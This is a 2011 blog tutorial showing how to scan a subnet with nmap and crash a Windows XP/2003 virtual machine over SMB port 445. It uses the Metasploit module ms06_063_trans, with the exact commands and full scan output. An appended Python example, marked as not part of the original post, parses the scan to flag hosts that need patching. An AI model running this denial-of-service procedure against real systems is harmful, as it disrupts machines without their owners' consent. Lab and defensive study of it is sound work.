Tuesday, 20 December 2011

DOS WITH METASPLOIT

This afternoon, rather than sit idle, I wrote a post about DoS with Metasploit: within a single network we can restart a target computer (Windows) with Metasploit via port 445. In this example I attack a target computer running as a virtual machine (there is no LAN at my boarding house, hehe). OK, let's get straight to it, check this out:

 1. Run a port scan with nmap over a range.

root@dumbastish:~# nmap -O 192.168.56.1/24

Result:

root@dumbastish:~# nmap -O 192.168.56.1/24

Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-20 17:59 WIT
Nmap scan report for 192.168.56.1
Host is up (0.000047s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
21/tcp open ftp
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.19 - 2.6.39
Network Distance: 0 hops

Nmap scan report for 192.168.56.100
Host is up (0.000029s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:61:7C:24 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

Nmap scan report for 192.168.56.101
Host is up (0.00045s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
4444/tcp open krb524
MAC Address: 08:00:27:FC:BF:0A (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 23.50 seconds
root@dumbastish:~#

192.168.56.101 is the target computer, with port 445 open.

 2. Open Metasploit and use dos/windows/smb/ms06_063_trans, typing the commands below:

use dos/windows/smb/ms06_063_trans
set LPORT 445
set RHOST 192.168.56.101
run

 3. Yeah, once Metasploit is running, the target computer goes into shock and restarts.

[Screenshots: restart-1, restart-2, restart-3]
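A defender's view of the scan in step 1, as an added example that is not part of the original post: it parses nmap's normal output (an excerpt of the output above is embedded) and lists hosts that expose 445/tcp, marking legacy Windows fingerprints so they can be patched for MS06-063 or have SMB filtered. The function names and the legacy-OS pattern are assumptions made for this illustration.

```python
import re

# Excerpt of the nmap output shown in step 1 of this post.
SCAN = """\
Nmap scan report for 192.168.56.1
21/tcp open ftp
Running: Linux 2.6.X
Nmap scan report for 192.168.56.100
All 1000 scanned ports on 192.168.56.100 are filtered
Nmap scan report for 192.168.56.101
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
4444/tcp open krb524
Running: Microsoft Windows XP|2003
"""

# Also accepts the "name (address)" form nmap prints when a host resolves.
HOST_RE = re.compile(r"^Nmap scan report for (?:.* \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# Assumption: OS fingerprints treated as legacy Windows for patch triage.
LEGACY_RE = re.compile(r"Windows.*\b(XP|2000|2003)\b")

def parse_hosts(text):
    """Return {host: {"ports": {(port, proto), ...}, "os": str}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"ports": set(), "os": ""})
        elif current is not None:
            p = PORT_RE.match(line)
            if p:
                current["ports"].add((int(p.group(1)), p.group(2)))
            elif line.startswith("Running:"):
                current["os"] = line.split(":", 1)[1].strip()
    return hosts

def smb_exposure(text):
    """List (host, os, is_legacy) for every host with 445/tcp open."""
    return [(host, info["os"], bool(LEGACY_RE.search(info["os"])))
            for host, info in sorted(parse_hosts(text).items())
            if (445, "tcp") in info["ports"]]

if __name__ == "__main__":
    for host, os_name, legacy in smb_exposure(SCAN):
        print(host, os_name, "PATCH/FILTER 445" if legacy else "review SMB exposure")
```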

I hope this is useful to all of you.
regards, dumbastish